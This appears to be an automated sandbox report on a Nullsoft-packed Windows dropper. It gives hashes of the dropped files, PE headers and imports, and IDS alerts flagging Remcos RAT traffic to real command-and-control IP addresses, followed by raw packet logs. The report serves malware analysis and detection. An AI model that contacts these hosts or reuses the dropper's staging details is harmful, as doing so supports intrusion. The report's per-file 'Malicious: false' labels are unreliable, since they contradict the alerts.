Malicious:	false
Preview:	L..................F........................................................e....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....r.1...........punktnedslagenes..R............................................p.u.n.k.t.n.e.d.s.l.a.g.e.n.e.s... .n.2...........Suspired157.Ege.P............................................S.u.s.p.i.r.e.d.1.5.7...E.g.e.......=.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.\.p.u.n.k.t.n.e.d.s.l.a.g.e.n.e.s.\.S.u.s.p.i.r.e.d.1.5.7...E.g.e.0.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.b.r.u.g.s.e.r.\.b.r.u.g.o.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

C:\Users\user\AppData\Roaming\brugser\brugo\Ildslukkeres.Pen

Download File

Process:	C:\Users\user\Desktop\KO0q4biYfC.exe
File Type:	data
Category:	dropped
Size (bytes):	306984
Entropy (8bit):	7.485939270706132
Encrypted:	false
SSDEEP:	6144:n4IWxRD05YSK87trt66tzNpZ8Ic4OXhreBN4fFPxjbp/6lKkB:Q0KF877z7ZNcDeNsFeIkB
MD5:	184F572AF16BA0E7D7281A80057FD04E
SHA1:	9FEFBF04F1B17996D712DF9724F871BA13A42AD8
SHA-256:	D213280BE3707518E1E499B3813ACBF8CD841562BA151D6FE793D67E0C44ED6B
SHA-512:	B0BF6173F6D7DC15CCA50B37E0C40167A0F7D3889918AFF9296FCB1609A6EA8CDD5F27FD3B08547E97394BEDDD9F63442ED629B8840E6FAC6F21535F8E6C30E9
Malicious:	false
Preview:	................qqqq.....!..JJJ....................a..S....j..........z.......@.....}}.......++........y.cc............Z.++.......................?.....LL..b.......}}}...............................BBB.................dd..........Q..BB...SSSS......ffff............P...```......M....................................d......yy............................??.%...............d..#....zzz..................ZZ.......................K.D...........666.........lll.........................99....>>>>.R...66....<....$$..00.................tt...........2......%.......P..................eeee.&&&&...............................E..N..yyy.......................................ff.BBB.....__..qq...................11...........yy.......'''.............9.<............mm............ ......q.77..........l.::.............B.>>>.OOOOOOOO.,..j......................................,.......h........................FF..kk.......................(.........999..................5...........................^..................

C:\Users\user\AppData\Roaming\brugser\brugo\Massserne.Raa

Download File

Process:	C:\Users\user\Desktop\KO0q4biYfC.exe
File Type:	data
Category:	dropped
Size (bytes):	155537
Entropy (8bit):	4.597274077711085
Encrypted:	false
SSDEEP:	3072:jc+cpSgcUDVHm2NJQbDE+sjpedvV87Bhc:jijm2NwDQjcdCBhc
MD5:	ACA226E514F0BAECDA048E0004E23A09
SHA1:	E1612A55FFB915C049316143F895AC4AF49D14EC
SHA-256:	8C499A099415A34064D16049832A3427362EEF87EB1BCFA2B885916A31EE6929
SHA-512:	FFE04312B9FE43B2E906C0237366E6F0F792AB810ABADC163D295DECBD645DC4CCE0C09F66422736D70B7815DFFE69BD7E36142A735709BF9413EDC2E56082D1
Malicious:	false
Preview:	.....Q.8..........-----------......--.P.....bbb............................................LLL.K.2...y..@........u.....DD...................\|.......44..00...........U.............U.......NN....r.AA...::...................).....BB...JJ..t......iiii......f..........A.M.\|\|\|\|..............................,.....L...............c..................................9.;;..}}}..000......tt.TTTT..tt.UUUU........."".[[....!!!!!.>..j......q....--..aaa.....J.<.I..........E....V.;......2.X.R..............22.........9999.....c.E........................CC..Y....5.....................u..............A..\|\|....E..............'..P..jj.........#...............{{.........................OO....jjjj....w..........``..................................aaa................f.........''.......:.eee..cc.....(..........II...............................b......F..............z.....mm................O..)).....".....1111...............B..XXX......R.#...................j..D...))))................FF...............NN.....{{....

C:\Users\user\AppData\Roaming\brugser\brugo\Ornithoscopist180.ker

Download File

Process:	C:\Users\user\Desktop\KO0q4biYfC.exe
File Type:	data
Category:	dropped
Size (bytes):	201388
Entropy (8bit):	1.2599777401529801
Encrypted:	false
SSDEEP:	768:ZIOwv7/4y518Ym+iRHdKfXfxpG2qBly2QZK9jj8xuFpHl6GaKO61ai4CQPqW2WGG:OpVfamJe9tL+c
MD5:	CDE4889F58D3EB5A7065C9E5987E8177
SHA1:	56684A59AD1D585BF075027112AF276335EACD32
SHA-256:	5EDDD57B4C7571FCD676FC13204457E8B91AD438E9B366B446254DFD3AD7AF80
SHA-512:	CB8813AD174A64CC9E2CEC9B70A3834090491BEAB794F090E6DE1F1758371A67226392F4D2E7F38D16EDC6FDF1D5B983FFC5DB9AEFC242154D8C025CCD812BA7
Malicious:	false
Preview:	......................................~................................x........a.........................................................................v.....................................................................+....................................]............................7...#...................................................=.....z.........................................................................................................................*...............S....P2....K..........Y...............................................t.............E...C.....................................g................................................................................{..................................W...(.............(.................x...............................................................).............................................&................a..........................................................................................Z.f...........

C:\Users\user\AppData\Roaming\brugser\brugo\grinagtigere.per

Download File

Process:	C:\Users\user\Desktop\KO0q4biYfC.exe
File Type:	FoxPro FPT, blocks size 233, next free block index 1638400, field type 0
Category:	dropped
Size (bytes):	417306
Entropy (8bit):	1.25574612059914
Encrypted:	false
SSDEEP:	1536:aj7/S3pUnjTFMxKzAlcC94NT2k0ZxIM43es9K:aj7/S3pUnjit6TuZCMy9
MD5:	E3E7516A4D2A0EE5A1B1FB393811A423
SHA1:	8F31AE423FA82BB21314B716DBA950670E8CEEA3
SHA-256:	1967201FD10C90B86BDE598FF3540C07FDC143F57EBBAD9D81C461C38C210FE0
SHA-512:	1FF7CD5BEC532BCE25AC75A3070EE7986BA7B2B97A454ADD88302C894069AA3B13D739F79F1DEB23B6050412E81CA8AE3AE8D1321B2939B838BAC33191C5C058
Malicious:	false
Preview:	.............A...........2.................v.................................................................................................................[......................................................=........................................C..........i....................../....................T.[.................V.................................+........O..................n................................'~.......].........................>........................._....s.....................................................w..............................D.............................................................................................................................6'.........1...6..................................................................................d.......2................................2............................{..............3.....................$...........................................q............6................u....................

C:\Users\user\AppData\Roaming\brugser\brugo\sarcosomal.vas

Download File

Process:	C:\Users\user\Desktop\KO0q4biYfC.exe
File Type:	data
Category:	dropped
Size (bytes):	228229
Entropy (8bit):	1.2621962744718846
Encrypted:	false
SSDEEP:	768:YBW9ff3l/VBidoMDdUNnDqIOnc6ZDJJycbIb2dhcGc94l2DuFwPPfqXky4CXnDIn:tQ1yjP7y3MZem/M8ibm
MD5:	B3FC9F1CBE42201FC277CEDCA9D573D6
SHA1:	6DD83571AB9E6BEFE6A51C8EC02EACBA85D37576
SHA-256:	B97BD584BEACFBEE7D8FC3BE1220BEC44B5450696F15E02DFD9739AFC57F64E2
SHA-512:	D314052BA4909521C30184705BB8A90209465FE5DCBBDB037E4CCBFF8797E9118CE96FB432EFBAFC2DAF6EFA4A57143B9F65ADC5BFF33F80CB9A0FF9886A3B3D
Malicious:	false
Preview:	........~............... ..............................................q.......=..................................0...................................U..........................................&.............................h.....................o.....................................................................u..................4............q..t............................................................_..............................i..#...........................................................r...............................c........C............*...................Qz..P.................................f.......................N.........+...............................\................................................................@.................................................3............:..............................................W........................................................ .........:..............q..................c....+........................F.......^..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.955449898327909
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	KO0q4biYfC.exe
File size:	518'146 bytes
MD5:	dd935b0e91e2e551b21296d8fa186d11
SHA1:	9638372c80f866bdc1b73af7971918e8ba7ab9e7
SHA256:	03fe92bf84effb45dfb4c47da5704f0b35c3ca3b562ac2f46c1da51a8829eb5e
SHA512:	fdf1ffbeb25f7e0b691c6f0127c297c804d1ecc71579fef69e7d27429902988ee84b34ce2826c49b213f96b1a47d32868ddbcd23d4954d5d80535373fb40d109
SSDEEP:	12288:B7MTFoKqS6k0jRWhI/L366W5Fd3IYXCNoSZFDHBa7Pqh:B7MTFoZS6kURFL66seoS3Dha7ih
TLSH:	60B423932EC0A51BD293493226B98F2EA7F7EA450C528A1F378E791D7C03681591F377
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....

File Icon


Icon Hash:	3672584dcccc5859

Static PE Info

General

Entrypoint:	0x4034a5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1f23f452093b5c1ff091a2f9fb4fa3e9

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007F760D1A4943h
push ebx
call 00007F760D1A7C0Dh
cmp eax, ebx
je 00007F760D1A4939h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F760D1A7B87h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F760D1A491Ch
push 0000000Ah
call 00007F760D1A7BE0h
push 00000008h
call 00007F760D1A7BD9h
push 00000006h
mov dword ptr [0042A244h], eax
call 00007F760D1A7BCDh
cmp eax, ebx
je 00007F760D1A4941h
push 0000001Eh
call eax
test eax, eax
je 00007F760D1A4939h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x3160	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6409	0x6600	bfe2b726d49cbd922b87bad5eea65e61	False	0.6540287990196079	data	6.416186322230332	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1396	0x1400	d45dcba8ca646543f7e339e20089687e	False	0.45234375	data	5.154907432640367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	8575fc5e872ca789611c386779287649	False	0.5026041666666666	data	4.004402321344153	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x27000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x52000	0x3160	0x3200	5fdda3be35833d5b81b736432c211617	False	0.491640625	data	5.547370199718841	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x52208	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4990663900414938
RT_DIALOG	0x547b0	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x548d0	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x549f0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x54ab8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x54b18	0x14	data	English	United States	1.15
RT_VERSION	0x54b30	0x2ec	data	English	United States	0.49732620320855614
RT_MANIFEST	0x54e20	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T15:07:57.807858+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49979	87.120.84.23	2404	TCP
2025-01-08T15:08:32.533594+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49794	164.160.91.32	443	TCP
2025-01-08T15:08:57.740105+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49830	87.120.84.23	2404	TCP
2025-01-08T15:09:20.148425+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49969	87.120.84.23	2404	TCP
2025-01-08T15:09:42.537707+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49972	87.120.84.23	2404	TCP
2025-01-08T15:10:04.942338+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49973	87.120.84.23	2404	TCP
2025-01-08T15:10:27.348794+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49974	87.120.84.23	2404	TCP
2025-01-08T15:10:49.740018+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49975	87.120.84.23	2404	TCP
2025-01-08T15:11:12.134329+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49976	87.120.84.23	2404	TCP
2025-01-08T15:11:34.522128+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49977	87.120.84.23	2404	TCP
2025-01-08T15:11:56.881424+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.7	49978	87.120.84.23	2404	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 15:08:30.908309937 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:30.908339977 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:30.908417940 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:30.940923929 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:30.940939903 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:31.944314957 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:31.946887016 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:31.996629953 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:31.996649027 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:31.996877909 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:31.996970892 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.000943899 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.047339916 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.533598900 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.534221888 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.759612083 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.759624004 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.759654045 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.759728909 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.759743929 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.759778023 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.759812117 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.760972977 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.760989904 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.761038065 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.761045933 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.761092901 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.761092901 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.985199928 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.985208035 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.985245943 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.985342026 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.985342026 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.985361099 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.985415936 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.986733913 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.986748934 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.986794949 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.986804008 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.986819029 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.986860037 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.987806082 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.987819910 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.987878084 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.987885952 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.987896919 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.987931967 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.989578009 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.989590883 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.989635944 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.989643097 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:32.989667892 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:32.989691973 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.210932970 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.210942030 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.210983038 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.211007118 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.211019039 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.211133003 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.211668968 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.211684942 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.211735964 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.211745024 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.211761951 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.211785078 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.212244034 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.212258101 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.212300062 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.212306976 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.212332964 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.212371111 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.213213921 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.213231087 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.213279009 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.213285923 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.213299036 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.213334084 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.214116096 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.214132071 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.214179993 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.214188099 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.214199066 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.214229107 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.215039015 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.215053082 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.215095997 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.215104103 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.215147018 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.215147018 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.298804045 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.298820019 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.298894882 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.298908949 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.298947096 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.298947096 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.436253071 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.436275005 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.436332941 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.436342955 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.436378002 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.436844110 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.436865091 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.436899900 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.436906099 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.436929941 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.436944962 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.437681913 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.437696934 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.437735081 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.437741041 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.437772036 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.437789917 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.437988997 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.438007116 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.438049078 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.438057899 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.438174963 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.438222885 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.438256025 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.438272953 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.438303947 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.438311100 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.438338995 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.438347101 CET	49794	443	192.168.2.7	164.160.91.32
